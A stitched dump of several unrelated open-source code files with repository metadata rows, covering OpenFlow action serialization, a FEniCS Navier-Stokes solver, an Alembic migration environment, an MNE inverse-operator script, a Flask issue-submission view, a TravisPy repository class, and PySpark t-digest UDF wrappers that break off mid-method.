packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!H", self.subtype))
packed.append('\x00' * 2)
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = nicira_dec_ttl()
_type = reader.read("!H")[0]
assert(_type == 65535)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
_experimenter = reader.read("!L")[0]
assert(_experimenter == 8992)
_subtype = reader.read("!H")[0]
assert(_subtype == 18)
reader.skip(2)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("nicira_dec_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
nicira.subtypes[18] = nicira_dec_ttl
class output(action):
type = 0
def __init__(self, port=None, max_len=None):
if port != None:
self.port = port
else:
self.port = 0
if max_len != None:
self.max_len = max_len
else:
self.max_len = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(util.pack_port_no(self.port))
packed.append(struct.pack("!H", self.max_len))
packed.append('\x00' * 6)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = output()
_type = reader.read("!H")[0]
assert(_type == 0)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.port = util.unpack_port_no(reader)
obj.max_len = reader.read("!H")[0]
reader.skip(6)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.port != other.port: return False
if self.max_len != other.max_len: return False
return True
def pretty_print(self, q):
q.text("output {")
with q.group():
with q.indent(2):
q.breakable()
q.text("port = ");
q.text(util.pretty_port(self.port))
q.text(","); q.breakable()
q.text("max_len = ");
q.text("%#x" % self.max_len)
q.breakable()
q.text('}')
action.subtypes[0] = output
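# Illustrative round-trip (sketch; every generated action class follows this
# pattern, assuming loxi.generic_util.OFReader):
#   a = output(port=1, max_len=0xffff)
#   action.unpack(loxi.generic_util.OFReader(a.pack())) == a    # -> True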
class pop_mpls(action):
type = 20
def __init__(self, ethertype=None):
if ethertype != None:
self.ethertype = ethertype
else:
self.ethertype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!H", self.ethertype))
packed.append('\x00' * 2)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = pop_mpls()
_type = reader.read("!H")[0]
assert(_type == 20)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.ethertype = reader.read("!H")[0]
reader.skip(2)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.ethertype != other.ethertype: return False
return True
def pretty_print(self, q):
q.text("pop_mpls {")
with q.group():
with q.indent(2):
q.breakable()
q.text("ethertype = ");
q.text("%#x" % self.ethertype)
q.breakable()
q.text('}')
action.subtypes[20] = pop_mpls
class pop_vlan(action):
type = 18
def __init__(self):
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = pop_vlan()
_type = reader.read("!H")[0]
assert(_type == 18)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
return True
def pretty_print(self, q):
q.text("pop_vlan {")
with q.group():
with q.indent(2):
q.breakable()
q.breakable()
q.text('}')
action.subtypes[18] = pop_vlan
class push_mpls(action):
type = 19
def __init__(self, ethertype=None):
if ethertype != None:
self.ethertype = ethertype
else:
self.ethertype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!H", self.ethertype))
packed.append('\x00' * 2)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = push_mpls()
_type = reader.read("!H")[0]
assert(_type == 19)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.ethertype = reader.read("!H")[0]
reader.skip(2)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.ethertype != other.ethertype: return False
return True
def pretty_print(self, q):
q.text("push_mpls {")
with q.group():
with q.indent(2):
q.breakable()
q.text("ethertype = ");
q.text("%#x" % self.ethertype)
q.breakable()
q.text('}')
action.subtypes[19] = push_mpls
class push_vlan(action):
type = 17
def __init__(self, ethertype=None):
if ethertype != None:
self.ethertype = ethertype
else:
self.ethertype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!H", self.ethertype))
packed.append('\x00' * 2)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = push_vlan()
_type = reader.read("!H")[0]
assert(_type == 17)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.ethertype = reader.read("!H")[0]
reader.skip(2)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.ethertype != other.ethertype: return False
return True
def pretty_print(self, q):
q.text("push_vlan {")
with q.group():
with q.indent(2):
q.breakable()
q.text("ethertype = ");
q.text("%#x" % self.ethertype)
q.breakable()
q.text('}')
action.subtypes[17] = push_vlan
class set_field(action):
type = 25
def __init__(self, field=None):
if field != None:
self.field = field
else:
self.field = None
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(self.field.pack())
length = sum([len(x) for x in packed])
packed.append(loxi.generic_util.pad_to(8, length))
length += len(packed[-1])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_field()
_type = reader.read("!H")[0]
assert(_type == 25)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.field = ofp.oxm.oxm.unpack(reader)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.field != other.field: return False
return True
def pretty_print(self, q):
q.text("set_field {")
with q.group():
with q.indent(2):
q.breakable()
q.text("field = ");
q.pp(self.field)
q.breakable()
q.text('}')
action.subtypes[25] = set_field
class set_mpls_ttl(action):
type = 15
def __init__(self, mpls_ttl=None):
if mpls_ttl != None:
self.mpls_ttl = mpls_ttl
else:
self.mpls_ttl = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!B", self.mpls_ttl))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_mpls_ttl()
_type = reader.read("!H")[0]
assert(_type == 15)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.mpls_ttl = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.mpls_ttl != other.mpls_ttl: return False
return True
def pretty_print(self, q):
q.text("set_mpls_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.text("mpls_ttl = ");
q.text("%#x" % self.mpls_ttl)
q.breakable()
q.text('}')
action.subtypes[15] = set_mpls_ttl
class set_nw_ttl(action):
type = 23
def __init__(self, nw_ttl=None):
if nw_ttl != None:
self.nw_ttl = nw_ttl
else:
self.nw_ttl = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!B", self.nw_ttl))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_nw_ttl()
_type = reader.read("!H")[0]
assert(_type == 23)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.nw_ttl = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.nw_ttl != other.nw_ttl: return False
return True
def pretty_print(self, q):
q.text("set_nw_ttl {")
with q.group():
with q.indent(2):
q.breakable()
q.text("nw_ttl = ");
q.text("%#x" % self.nw_ttl)
q.breakable()
q.text('}')
action.subtypes[23] = set_nw_ttl
class set_queue(action):
type = 21
def __init__(self, queue_id=None):
if queue_id != None:
self.queue_id = queue_id
else:
self.queue_id = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!H", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for len at index 1
packed.append(struct.pack("!L", self.queue_id))
length = sum([len(x) for x in packed])
packed[1] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = set_queue()
_type = reader.read("!H")[0]
assert(_type == 21)
_len = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_len, 4)
obj.queue_id = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.queue_id != other.queue_id: return False
return True
def pretty_print(self, q):
q.text("set_queue {")
with q.group():
with q.indent(2):
q.breakable()
q.text("queue_id = ");
q.text("%#x" % self.queue_id)
q.breakable()
q.text('}')
action.subtypes[21] = set_queue
|
gpl-2.0
| 3,260,647,571,613,940,000
| 27.317418
| 88
| 0.518843
| false
| 3.653131
| false
| false
| false
|
Juanlu001/CBC.Solve
|
cbc/flow/saddlepointsolver.py
|
1
|
7125
|
__author__ = "Marie E. Rognes"
__copyright__ = "Copyright (C) 2012 Simula Research Laboratory and %s" % __author__
__license__ = "GNU GPL Version 3 or any later version"
# Last changed: 2012-05-01
__all__ = ["TaylorHoodSolver"]
from dolfin import *
from cbc.common.utils import *
from cbc.common import *
class TaylorHoodSolver(CBCSolver):
"""Navier-Stokes solver using a plain saddle point
formulation. This should be ridiculously robust. No boundary
forces allowed."""
def __init__(self, problem):
"Initialize Navier-Stokes solver"
# Initialize base class
CBCSolver.__init__(self)
# Set up parameters
self.parameters = Parameters("solver_parameters")
self.parameters.add("plot_solution", False)
self.parameters.add("save_solution", False)
self.parameters.add("store_solution_data", False)
zero_average_pressure = False
# Get mesh and time step range
mesh = problem.mesh()
dt, t_range = timestep_range_cfl(problem, mesh)
info("Using time step dt = %g" % dt)
# Function spaces
V1 = VectorFunctionSpace(mesh, "CG", 1)
V = VectorFunctionSpace(mesh, "CG", 2)
Q = FunctionSpace(mesh, "CG", 1)
if zero_average_pressure:
R = FunctionSpace(mesh, "R", 0)
W = MixedFunctionSpace([V, Q, R])
else:
W = V*Q
# Coefficients
mu = Constant(problem.viscosity()) # Dynamic viscosity [Ps x s]
rho = Constant(problem.density()) # Density [kg/m^3]
n = FacetNormal(mesh)
k = Constant(dt)
f = problem.body_force(V1)
g = problem.boundary_traction(V1)
w = problem.mesh_velocity(V1)
# If no body forces are specified, assume it is 0
if f == []:
f = Constant((0,)*V1.mesh().geometry().dim())
if g == []:
g = Constant((0,)*V1.mesh().geometry().dim())
# Create boundary conditions
bcu = create_dirichlet_conditions(problem.velocity_dirichlet_values(),
problem.velocity_dirichlet_boundaries(),
W.sub(0))
# Allow this just to be able to set all values directly
bcp = create_dirichlet_conditions(problem.pressure_dirichlet_values(),
problem.pressure_dirichlet_boundaries(),
W.sub(1))
# Create initial conditions
u0 = create_initial_condition(problem.velocity_initial_condition(), V)
u0 = interpolate(u0, V)
p0 = create_initial_condition(problem.pressure_initial_condition(), Q)
p0 = interpolate(p0, Q)
# Create initial function
upr0 = Function(W)
upr0.vector()[:V.dim()] = u0.vector()
upr0.vector()[V.dim():V.dim()+Q.dim()] = p0.vector()
# Create function for solution at previous time
upr_ = Function(W)
upr_.assign(upr0)
if zero_average_pressure:
(u_, p_, r_) = split(upr_)
else:
(u_, p_) = split(upr_)
#u0 = Function(V)
#p0 = Function(Q)
# Test and trial functions
upr = Function(W)
if zero_average_pressure:
(u, p, r) = split(upr)
(v, q, s) = TestFunctions(W)
else:
(u, p) = split(upr)
(v, q) = TestFunctions(W)
u1 = Function(V)
p1 = Function(Q)
# Define Cauchy stress tensor
def sigma(v, p):
return 2.0*mu*sym(grad(v)) - p*Identity(v.cell().d)
# Mixed formulation
U = 0.5*(u_ + u)
F = (rho*(1/k)*inner(u - u_, v)*dx
+ rho*inner(grad(U)*(U - w), v)*dx
+ inner(sigma(U, p), sym(grad(v)))*dx
+ div(U)*q*dx
- inner(f, v)*dx
- inner(g, v)*ds)
if zero_average_pressure:
F += p*s*dx + q*r*dx
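# The residual F above is the midpoint-rule weak form of incompressible
# Navier-Stokes on a moving mesh (sketch, with U = (u + u_)/2):
#   rho*(u - u_)/k . v + rho*(grad(U)(U - w)) . v + sigma(U, p) : sym(grad(v))
#     + div(U)*q  =  f . v  (in the domain)  +  g . v  (on the boundary)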
# Store variables needed for time-stepping
self.mesh_velocity = w
self.W = W
self.dt = dt
self.k = k
self.t_range = t_range
self.bcu = bcu
self.bcp = bcp
self.f = f
self.g = g
self.upr_ = upr_
self.upr = upr
self.u0 = u0
self.u1 = u1
self.p0 = p0
self.p1 = p1
self.F = F
        # Empty file handlers / time series
        self.velocity_file = None
        self.pressure_file = None
        self.velocity_series = None
        self.pressure_series = None
        self.series = None  # combined time series used by store_solution_data
# Assemble matrices
self.reassemble()
def solve(self):
"Solve problem and return computed solution (u, p)"
# Time loop
for t in self.t_range:
# Solve for current time step
self.step(self.dt)
# Update
self.update(t)
self._end_time_step(t, self.t_range[-1])
return self.u1, self.p1
def step(self, dt):
"Compute solution for new time step"
# Always do this
self.dt = dt
self.k.assign(dt)
self.reassemble()
# Allow pressure boundary conditions for debugging
bcs = self.bcu
if self.bcp != []:
            info_green("Including pressure DirichletBC at your own risk")
bcs += self.bcp
# Compute solution
begin("Computing velocity and pressure and multiplier")
solve(self.F == 0, self.upr, bcs)
self.u1.assign(self.upr.split()[0])
self.p1.assign(self.upr.split()[1])
end()
return (self.u1, self.p1)
def update(self, t):
# This is hardly robust
# Update the time on the body force
self.f.t = t
self.g.t = t
# Propagate values
self.upr_.assign(self.upr)
self.u0.assign(self.u1)
self.p0.assign(self.p1)
# Plot solution
if self.parameters["plot_solution"]:
plot(self.p1, title="Pressure", rescale=True)
plot(self.u1, title="Velocity", rescale=True)
# Store solution (for plotting)
if self.parameters["save_solution"]:
if self.velocity_file is None: self.velocity_file = File("velocity.pvd")
if self.pressure_file is None: self.pressure_file = File("pressure.pvd")
self.velocity_file << self.u1
self.pressure_file << self.p1
# Store solution data
if self.parameters["store_solution_data"]:
if self.series is None:
self.series = TimeSeries("velocity-pressure-multiplier")
self.series.store(self.upr.vector(), t)
return self.u1, self.p1
def reassemble(self):
"Reassemble matrices, needed when mesh or time step has changed"
info("(Re)assembling matrices")
info("No action taken here in this solver")
def solution(self):
"Return current solution values"
return self.u1, self.p1
def solution_values(self):
"Return solution values at t_{n-1} and t_n"
return (self.u0, self.u1, self.p0, self.p1)
|
gpl-3.0
| 742,052,942,741,142,500
| 30.113537
| 84
| 0.543298
| false
| 3.66701
| false
| false
| false
|
GaretJax/irco
|
irco/migrations/env.py
|
1
|
2676
|
from __future__ import with_statement
from alembic import context
from sqlalchemy import engine_from_config, pool
from logging.config import dictConfig
# this is the Alembic Config object, which provides
# access to the values within the .ini file in use.
config = context.config
# Interpret the config file for Python logging.
# This block configures the loggers.
dictConfig({
'version': 1,
'formatters': {
'generic': {
'format': '%(levelname)-5.5s [%(name)s] %(message)s',
'datefmt': '%H:%M:%S',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'generic',
}
},
'loggers': {
'root': {
'level': 'WARN',
'handlers': ['console'],
},
'sqlalchemy': {
'level': 'WARN',
'handlers': ['console'],
'qualname': 'sqlalchemy.engine',
},
'alembic': {
'level': 'INFO',
'handlers': ['console'],
'qualname': 'alembic',
},
}
})
# add your model's MetaData object here
# for 'autogenerate' support
# from myapp import mymodel
# target_metadata = mymodel.Base.metadata
target_metadata = None
# other values from the config, defined by the needs of env.py,
# can be acquired:
# my_important_option = config.get_main_option("my_important_option")
# ... etc.
def run_migrations_offline():
"""Run migrations in 'offline' mode.
This configures the context with just a URL
and not an Engine, though an Engine is acceptable
here as well. By skipping the Engine creation
we don't even need a DBAPI to be available.
Calls to context.execute() here emit the given string to the
script output.
"""
url = config.get_main_option("sqlalchemy.url")
context.configure(url=url, target_metadata=target_metadata)
with context.begin_transaction():
context.run_migrations()
def run_migrations_online():
"""Run migrations in 'online' mode.
In this scenario we need to create an Engine
and associate a connection with the context.
"""
engine = engine_from_config(
config.get_section(config.config_ini_section),
prefix='sqlalchemy.',
poolclass=pool.NullPool
)
connection = engine.connect()
context.configure(
connection=connection,
target_metadata=target_metadata
)
try:
with context.begin_transaction():
context.run_migrations()
finally:
connection.close()
if context.is_offline_mode():
run_migrations_offline()
else:
run_migrations_online()
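# This script is not run directly: Alembic imports it when a command such as
# `alembic upgrade head` or `alembic revision --autogenerate` is executed.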
|
mit
| 2,895,014,743,879,245,000
| 24.730769
| 69
| 0.610613
| false
| 4.091743
| true
| false
| false
|
MadsJensen/malthe_alpha_project
|
make_inverse_operator.py
|
1
|
1501
|
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 31 10:00:32 2015
@author: mje
"""
import mne
from mne.minimum_norm import (make_inverse_operator, apply_inverse,
write_inverse_operator)
import socket
import numpy as np
import matplotlib.pyplot as plt
# Setup paths and prepare raw data
hostname = socket.gethostname()
if hostname == "Wintermute":
data_path = "/home/mje/mnt/caa/scratch/"
n_jobs = 1
else:
data_path = "/projects/MINDLAB2015_MEG-CorticalAlphaAttention/scratch/"
n_jobs = 1
subjects_dir = data_path + "fs_subjects_dir/"
fname_fwd = data_path + '0001-fwd.fif'
fname_cov = data_path + '0001-cov.fif'
fname_evoked = data_path + "0001_p_03_filter_ds_ica-mc_raw_tsss-ave.fif"
snr = 1.0
lambda2 = 1.0 / snr ** 2
# Load data
evoked = mne.read_evokeds(fname_evoked, condition=0, baseline=(None, 0))
forward_meeg = mne.read_forward_solution(fname_fwd, surf_ori=True)
noise_cov = mne.read_cov(fname_cov)
# Restrict forward solution as necessary for MEG
forward_meg = mne.pick_types_forward(forward_meeg, meg=True, eeg=False)
# Alternatively, you can just load a forward solution that is restricted
# Make the MEG-only inverse operator
inverse_operator_meg = make_inverse_operator(evoked.info, forward_meg,
noise_cov,
loose=0.2, depth=0.8)
write_inverse_operator('0001-meg-oct-6-inv.fif',
inverse_operator_meg)
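# A minimal sketch (not part of the original script) of applying the operator
# to the evoked data with MNE's apply_inverse:
#
#     stc = apply_inverse(evoked, inverse_operator_meg, lambda2, method="dSPM")
#     stc.save("0001-meg-dspm")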
|
mit
| 4,213,506,564,462,215,000
| 30.93617
| 75
| 0.655563
| false
| 3.146751
| false
| false
| false
|
tyler274/Recruitment-App
|
recruit_app/ia/views.py
|
1
|
1374
|
from flask import Blueprint, render_template, flash, redirect, request, url_for, current_app
from flask_security.decorators import login_required
from flask_security import current_user
from recruit_app.ia.managers import IaManager
from recruit_app.user.eve_api_manager import EveApiManager
from recruit_app.ia.forms import SubmitIssueForm
blueprint = Blueprint("ia", __name__, url_prefix='/ia', static_folder="../static")
@blueprint.route("/submit_issue", methods=['GET', 'POST'])
@login_required
def submit_issue():
# Check if user is in Karmafleet (98370861)
if not EveApiManager.check_if_character_is_in_corp(int(current_user.main_character_id), 98370861):
flash('You are not a current KarmaFleet member.', 'error')
return redirect(url_for('public.home'))
form = SubmitIssueForm()
    # Display the form on GET, process the submission on POST
if request.method == 'POST':
if form.validate_on_submit():
# Do the submission
if IaManager.submit_issue(current_user, form.subject.data, form.body.data, form.logs.data):
flash('Issue submitted successfully.', 'info')
else:
flash('Error submitting issue. Please try again later.', 'error')
return redirect(url_for('public.home'))
# GET
return render_template('ia/submit_issue.html', form=form)
|
bsd-3-clause
| -1,894,737,977,002,553,900
| 40.666667
| 103
| 0.676128
| false
| 3.754098
| false
| false
| false
|
menegazzo/travispy
|
travispy/entities/repo.py
|
2
|
2715
|
from ._stateful import Stateful
class Repo(Stateful):
'''
:ivar str slug:
Repository slug.
:ivar str description:
Description on |github|.
:ivar int last_build_id:
Build ID of the last executed build.
:ivar str last_build_number:
Build number of the last executed build.
:ivar str last_build_state:
Build state of the last executed build.
:ivar str last_build_duration:
Build duration of the last executed build.
:ivar str last_build_started_at:
Build started at of the last executed build.
:ivar str last_build_finished_at:
Build finished at of the last executed build.
:ivar str github_language:
Language on |github|.
:ivar bool active:
Whether or not the repository is active on |travisci|.
'''
__slots__ = [
'slug',
'description',
'last_build_id',
'last_build_number',
'last_build_state',
'last_build_duration',
'last_build_started_at',
'last_build_finished_at',
'last_build_language',
'github_language',
'active',
]
@property
def state(self):
'''
:class:`.Repo` state is given through ``last_build_state``.
.. seealso:: :class:`.Stateful` for ``state`` full documentation.
'''
return self.last_build_state
@property
def last_build(self):
'''
:rtype: :class:`.Build`
:returns:
A :class:`.Build` object with information related to current ``last_build_id``.
'''
from .build import Build
return self._load_one_lazy_information(Build, 'last_build_id')
@classmethod
def find_one(cls, session, entity_id, **kwargs):
result = super(Repo, cls).find_one(session, entity_id, **kwargs)
return result
def _set_hook(self, flag):
response = self._session.put(
self._session.uri + '/hooks/{}'.format(self.id),
json={"hook": {"active": flag}},
)
result = response.status_code == 200
if result:
self.active = flag
return result
def disable(self):
'''
Disable Travis CI for the repository.
:rtype: bool
:returns:
``True`` if API call was successful.
``False`` if API call was unsuccessful.
'''
return self._set_hook(False)
def enable(self):
'''
        Enable Travis CI for the repository.
        :rtype: bool
        :returns:
            ``True`` if API call was successful.
            ``False`` if API call was unsuccessful.
'''
return self._set_hook(True)
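# A minimal usage sketch (assumes a GitHub token; not part of this module):
#
#     from travispy import TravisPy
#     t = TravisPy.github_auth(GITHUB_TOKEN)
#     repo = t.repo('menegazzo/travispy')
#     repo.disable()  # turn the Travis CI hook off
#     repo.enable()   # and back on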
|
gpl-3.0
| -575,740,151,106,898,900
| 24.857143
| 91
| 0.559116
| false
| 4.202786
| false
| false
| false
|
isarn/isarn-sketches-spark
|
python/isarnproject/sketches/spark/tdigest.py
|
1
|
14993
|
import sys
import random
import itertools as it
from bisect import bisect_left, bisect_right
from pyspark.sql.types import UserDefinedType, StructField, StructType, \
ArrayType, DoubleType, IntegerType
from pyspark.sql.column import Column, _to_java_column, _to_seq
from pyspark.context import SparkContext
__all__ = ['tdigestIntUDF', 'tdigestLongUDF', 'tdigestFloatUDF', 'tdigestDoubleUDF', \
'tdigestMLVecUDF', 'tdigestMLLibVecUDF', \
'tdigestIntArrayUDF', 'tdigestLongArrayUDF', 'tdigestFloatArrayUDF', 'tdigestDoubleArrayUDF', \
'tdigestReduceUDF', 'tdigestArrayReduceUDF', \
'TDigest']
def tdigestIntUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of integer data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestIntUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestLongUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of long integer data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestLongUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestFloatUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of (single precision) float data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestFloatUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestDoubleUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of double float data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestDoubleUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestMLVecUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of ML Vector data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestMLVecUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestMLLibVecUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of MLLib Vector data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestMLLibVecUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestIntArrayUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of integer-array data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestIntArrayUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestLongArrayUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of long-integer array data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestLongArrayUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestFloatArrayUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of (single-precision) float array data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestFloatArrayUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestDoubleArrayUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of double array data.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestDoubleArrayUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestReduceUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of t-digests.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestReduceUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
def tdigestArrayReduceUDF(col, compression=0.5, maxDiscrete=0):
"""
Return a UDF for aggregating a column of t-digest vectors.
:param col: name of the column to aggregate
:param compression: T-Digest compression parameter (default 0.5)
:param maxDiscrete: maximum unique discrete values to store before reverting to
continuous (default 0)
"""
sc = SparkContext._active_spark_context
tdapply = sc._jvm.org.isarnproject.sketches.spark.tdigest.functions.tdigestArrayReduceUDF( \
compression, maxDiscrete).apply
return Column(tdapply(_to_seq(sc, [col], _to_java_column)))
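# A minimal usage sketch (assumes an active SparkSession and a DataFrame `df`
# with a numeric column "x"; not part of this module):
#
#     row = df.agg(tdigestDoubleUDF("x", compression=0.5).alias("td")).first()
#     td = row["td"]               # deserialized into the TDigest class below
#     median = td.cdfInverse(0.5)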
class TDigestUDT(UserDefinedType):
@classmethod
def sqlType(cls):
return StructType([
StructField("compression", DoubleType(), False),
StructField("maxDiscrete", IntegerType(), False),
StructField("cent", ArrayType(DoubleType(), False), False),
StructField("mass", ArrayType(DoubleType(), False), False)])
@classmethod
def module(cls):
return "isarnproject.sketches.udt.tdigest"
@classmethod
def scalaUDT(cls):
return "org.apache.spark.isarnproject.sketches.udtdev.TDigestUDT"
def simpleString(self):
return "tdigest"
def serialize(self, obj):
